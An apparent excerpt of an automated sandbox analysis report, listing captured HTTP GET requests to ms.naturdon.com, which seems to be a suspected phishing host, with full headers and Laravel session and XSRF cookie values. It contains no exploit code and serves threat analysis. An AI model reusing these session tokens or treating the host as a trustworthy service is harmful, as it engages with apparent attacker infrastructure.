              Source: global trafficHTTP traffic detected: GET /efGejjtuNnmhRtNkGlHs8IHE7ijpHoVGG7mAI92qSys9uQiaNo78150 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kllxu00N4Zd9GBpMkPRMJL6O3OU3at2FPw9cdgaD3BCq4jMfqcRJkHAx156168 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yffv1vad9P9hmqZugSh8sFC0AT0wf1FDJwiD9g7K8loVRR2l HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzZPq1XBIKmsvOqo3RxnZldjOCJGopOepJsTC8TNnrJljpdSYa2ab180 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /bchOwVqc98OOMxFnOkwnvkShNcSm0gU7WWsoh0kKAgri2ChjJkmLJPqsWUfGanp0uBm39YhI6pI8EfQbZqVGjekVGFrK5k97cDmn4NuLgYwOOxiNl3EBbfJ4ReUGdrShKoJ6AAcUp1LOhPfarPQ0dVtop662 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsiRQ3cvNAG26CoUf5EZGztTbj9RcijJpFa8IXrtlxvb50FCxcLWSef200 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxE3arEkk2RbNb59NyJropvgEEl7AIwr34125 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ghN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgxypCNYtBFhWI8elPUjiKnPef204 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /efGejjtuNnmhRtNkGlHs8IHE7ijpHoVGG7mAI92qSys9uQiaNo78150 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrmZhkmVs3lGM0Q2sgvoqCHgFfVy0uvbecffP7e0dWCi1FNiavl0Ms6yef238 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzZPq1XBIKmsvOqo3RxnZldjOCJGopOepJsTC8TNnrJljpdSYa2ab180 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stjXGvT17JklTv4LfDUGVIPdaYnFaQdUW4jCMkD3HbMhZoqA0Z67SnPrMnOwyyOYBACmgPHP6wGVVWZbZOviWBaoaGgh254 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsiRQ3cvNAG26CoUf5EZGztTbj9RcijJpFa8IXrtlxvb50FCxcLWSef200 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opSQsIIfCrYEifeBNcpBzLABefvLCJwGmOyMuRzcmBuX45133 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 